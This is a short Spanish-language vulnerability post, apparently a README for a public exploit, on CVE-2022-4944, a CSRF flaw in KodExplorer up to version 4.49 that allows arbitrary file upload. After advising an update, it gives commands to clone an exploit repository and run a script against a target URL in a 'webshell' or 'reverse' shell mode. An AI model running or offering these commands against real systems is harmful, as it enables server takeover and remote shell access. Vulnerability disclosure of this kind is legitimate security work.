
「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF a Subida Arbitraria de Archivos

Se ha encontrado una vulnerabilidad clasificada como problemática en kalcaddle KodExplorer hasta la versión 4.49. Afecta a una parte no especificada. La manipulación conduce a cross-site request forgery (CSRF). Esta vulnerabilidad está identificada de forma única como CVE-2022-4944. Es posible iniciar el ataque de forma remota. Además, existe un exploit disponible. Se recomienda actualizar el componente afectado.

pip install requests
git clone https://github.com/Brosck/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODO # modo webshell/reverse